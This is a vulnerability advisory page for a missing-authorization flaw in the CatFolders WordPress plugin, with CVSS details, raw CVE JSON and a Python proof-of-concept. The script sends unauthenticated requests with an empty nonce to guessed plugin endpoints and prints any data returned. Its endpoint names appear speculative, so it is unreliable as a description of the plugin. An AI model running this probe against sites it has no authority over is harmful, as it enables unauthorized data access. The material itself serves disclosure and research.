Security Vulnerability Report
中文
CVE-2025-66120 CVSS 5.3 MEDIUM

CVE-2025-66120

Published: 2025-12-16 09:15:56
Last Modified: 2026-04-27 18:16:37

Description

Missing Authorization vulnerability in CatFolders CatFolders catfolders allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CatFolders: from n/a through <= 2.5.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

CatFolders插件 <= 2.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66120 PoC - CatFolders Missing Authorization # This PoC demonstrates accessing protected endpoints without authorization import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site with CatFolders plugin is vulnerable """ # Common CatFolders AJAX endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/catfolders/v1/folders', '/wp-json/catfolders/v1/terms' ] # Try to access without authentication for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Test with minimal headers headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } # For AJAX endpoint, try common CatFolders actions if 'admin-ajax.php' in endpoint: data = { 'action': 'catfolders_get_folders', 'nonce': '' # Try without nonce } try: response = requests.post(url, data=data, headers=headers, timeout=10) if response.status_code == 200: print(f"[!] Endpoint {endpoint} responded without authentication") print(f"[+] Response preview: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") else: try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200 and 'catfolders' in response.text.lower(): print(f"[!] REST endpoint {endpoint} accessible without auth") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-66120.py <target_url>') print('Example: python cve-2025-66120.py http://example.com') sys.exit(1) target = sys.argv[1] print(f'[*] Checking vulnerability on: {target}') if check_vulnerability(target): print('[!] Target appears to be VULNERABLE') else: print('[+] Target appears to be PATCHED or not vulnerable')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66120", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:56.280", "lastModified": "2026-04-27T18:16:36.993", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in CatFolders CatFolders catfolders allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CatFolders: from n/a through <= 2.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/catfolders/vulnerability/wordpress-catfolders-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}